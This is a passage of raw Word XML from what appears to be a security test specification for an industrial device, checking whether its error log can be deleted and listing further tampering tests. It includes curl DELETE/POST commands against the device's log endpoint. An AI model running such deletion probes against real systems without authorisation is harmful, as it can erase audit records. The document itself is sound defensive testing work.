            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C9E877B"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Enumerate the interface for any delete/erase command applying to the tracing log.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C0784F" w14:textId="77777777" w:rsidR="007F3C1C"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Attempt any discoverable deletion operation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75DD7F1E" w14:textId="3AD46E01" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirm whether controlled deletion is possible and, if so, whether it is access-controlled.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5A4248" w14:textId="7600111A" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected: no controlled-deletion command exists (only the cold-start wipe) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the absence of data-lifecycle control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="253A77DA" w14:textId="77777777" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1499AC" w14:textId="77777777" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C930EC" w14:textId="77777777" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5330893D" w14:textId="7F2EB2AF" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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TC-RQ014-0</w:t>
            </w:r>
            <w:r w:rsidR="00142D2D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089283E" w:rsidRPr="006D5B99"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89283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C748999" w14:textId="4537FF4F"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D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t>NV1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089283E" w:rsidRPr="006D5B99"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89283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDA0D37" w14:textId="104A6034" w:rsidR="0089283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283E">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rPr>
              <w:t>curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089283E" w:rsidRPr="006D5B99"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89283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="650A2DBC"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export SRIO=192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52897DA2"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List all endpoints documented as service ‘S’ in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FA57EBF"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209_SRIO_CompSpec_Module_Com §5.3.1 (/devicecontrol/signal,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AFC6FDC" w14:textId="4B732C7B"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xml:space="preserve"># /firmware/install, /fit/setfit, ...) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> none of these relate to errorlog.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115BF1D0" w14:textId="77777777"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en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Test explicitly for a delete/erase capability:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F587675" w14:textId="39D94E22" w:rsidR="0089283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>curl -s -X DELETE http://$</w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t xml:space="preserve"> -w "%{http_code}\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5856C86B" w14:textId="282940EC" w:rsidR="0089283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>curl -s -X POST http://$</w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t xml:space="preserve"> -d '{}' -w "%{http_code}\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089283E" w:rsidRPr="006D5B99"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410C8984" w:rsidR="0089283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="021C5E2E" w14:textId="57B64187" w:rsidR="0089283E" w:rsidRPr="006D5B99" w:rsidRDefault="0089283E" w:rsidP="0089283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D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected: no delete/erase service exists; the only way to clear the log remains the (uncontrolled) cold-start wipe (confirms G-3).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="093BA8B1" w14:textId="77777777" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CA8632" w14:textId="77777777" w:rsidR="00142D2D" w:rsidRPr="006D5B99" w:rsidRDefault="00142D2D" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0982F731" w14:textId="77777777" w:rsidR="00142D2D" w:rsidRPr="006D5B99" w:rsidRDefault="00142D2D" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2D2C93" w14:textId="77777777" w:rsidR="00142D2D" w:rsidRPr="006D5B99" w:rsidRDefault="00142D2D" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04061A1C" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BEE76B" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C02FA70" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D21E709" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D06513" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8D3548" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101DB1C8" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700F01EC" w14:textId="77777777" w:rsidR="00580B31" w:rsidRPr="006D5B99" w:rsidRDefault="00580B31" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2760285D" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Possible additions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF93993" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A228250" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EDFC9A" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="006D5B99">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0042A3" w14:textId="7EE1C1A6" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="006D5B99">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signal injection at the physical layer (PHY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0944DF" w14:textId="35CEF305" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="006D5B99">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transceiver/buffer overflow at the hardware level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4212A" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67990F5D" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF4B15" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78205ED5" w14:textId="24844950" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="006D5B99">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Physical tampering attempt on the log memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE31B7A" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA1C1CD" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>RQ-004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94D54C" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Tampering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C7C052" w14:textId="5FD99DD0" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Firmware version spoofing (version rollback / manipulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529B911" w14:textId="3A882BB3" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manipulation of I&amp;M data (Identification &amp; Maintenance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CADB29F" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Separation of Concerns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA3162" w14:textId="15014487" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overlapping configuration injection (boundary test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62358292" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DF128D" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD77A33" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00AE64D7">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Runtime Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E77BB3D" w14:textId="50A63782" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NVRAM / Flash tampering of the safety configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256DC4B" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00AE64D7">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain Separation &amp; Security Functionality Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DE782" w14:textId="13AC5683" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="00B3644E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JTAG / Debug Port Lockdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB76442" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="628DFF88" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
